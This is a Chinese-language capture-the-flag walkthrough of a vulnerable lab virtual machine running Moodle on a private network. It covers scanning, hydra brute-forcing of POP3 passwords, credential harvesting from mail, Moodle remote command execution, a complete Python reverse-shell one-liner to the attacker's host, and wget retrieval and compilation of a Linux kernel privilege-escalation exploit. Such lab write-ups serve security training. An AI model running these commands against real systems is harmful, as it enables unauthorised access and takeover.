目录
环境搭建
设置为net模式开启虚拟机
主机发现
arp-scan -l
192.168.164.166
端口扫描
nmap -sS -sV -p- 192.168.164.166
信息收集
访问80端口
访问http://192.168.164.166/sev-home/
查看网页源代码发现terminal.js
// //Boris, make sure you update your default password. //My sources say MI6 maybe planning to infiltrate. //Be on the lookout for any suspicious network traffic.... // //I encoded you p@ssword below... // //InvincibleHack3r // //BTW Natalya says she can break your codes //
发现用户Boris、Natalya
对密码进行解密,InvincibleHack3r
尝试登录boris/InvincibleHack3r成功
pop3 服务配置为在非常高的非默认端口上
用hydra爆破一下POP3服务器的密码
hydra 192.168.164.166 -s 55007 pop3 -L user.txt -P /usr/share/wordlists/fasttrack.txt
用户:boris 密码:secret1! 用户:natalya 密码:bird
使用nc连接pop3服务,登录这两个账号查看邮箱里面的邮件信息
nc 192.168.164.166 55007
登录另外一个账号看看
通过第二封邮件发现,要求我们在本地hosts中添加域名信息
用户名:xenia 密码:RCP90rulez! 域:severnaya-station.com 网址:severnaya-station.com/gnocertdir
浏览器中打开http://severnaya-station.com/gnocertdir/
在登陆页面输入邮件中发现的用户和密码
登录成功
在"My profile"-->"Messages"-->选择"Recent conversations"(最近的对话)看到一个名为doak 的用户
用hydra爆破该用户的密码
hydra 192.168.164.166 -s 55007 pop3 -l "doak" -P /usr/share/wordlists/fasttrack.txt
用户名:doak 密码:goat
登录该用户的邮箱
nc 192.168.164.166 55007
username: dr_doak password: 4England!
用该账号登录http://severnaya-station.com/gnocertdir/login/index.php
发现一个 s3cret.txt文件
访问http://severnaya-station.com/dir007key/for-007.jpg
将图片下载下来
使用strings查看图片
strings for-007.jpg
将eFdpbnRlcjE5OTV4IQ==进行解码得到xWinter1995x!
管理员账户登录成功
漏洞探测
由于之前得知该网站的cms是Moodle的2.2.3版本,通过百度搜索可以知道该版本有个远程命令执行的漏洞
在利用的EXP中在POST的时候需要将拼写检查google spell换成PSpellSHell,原因是目标主机上不存在GCC编译,只有CC编译
在"Settings"-->"Site administration"-->"Plugins"-->"Text editors"-->"TinyMCE HTML editor" 修改PSpellSHel
在"Settings"-->"Site administration"-->"Server"-->"System paths"-->"Path to aspell" 进行命令执行
漏洞利用
使用python进行反弹shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.164.134",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
开启监听4444端口,通过在blog中新建文章,随便输入字符,点击"Toggle Spellchecker"之后就会反弹到shell
nc -nvlp 4444
提权
获得交互式shell
python -c 'import pty; pty.spawn("/bin/bash")'
根据前面获取的系统版本- Linux ubuntu 3.13.0,在kali中查找相关漏洞
searchsploit Linux ubuntu 3.13.0
先将exp拷贝到home目录下
cp /usr/share/exploitdb/exploits/linux/local/37292.c /home/kali/Desktop
由于EXP里面是使用gcc编译的 ,所以这里在靶机里面进行探测,发现没装gcc,但装了cc,先将EXP下载过来,然后进行修改
然后使用python创建一个服务,通过服务上传37292.c到靶机中
python -m http.server 8000
wget http://192.168.164.134:8000/37292.c
cc 37292.c -o ww
./ww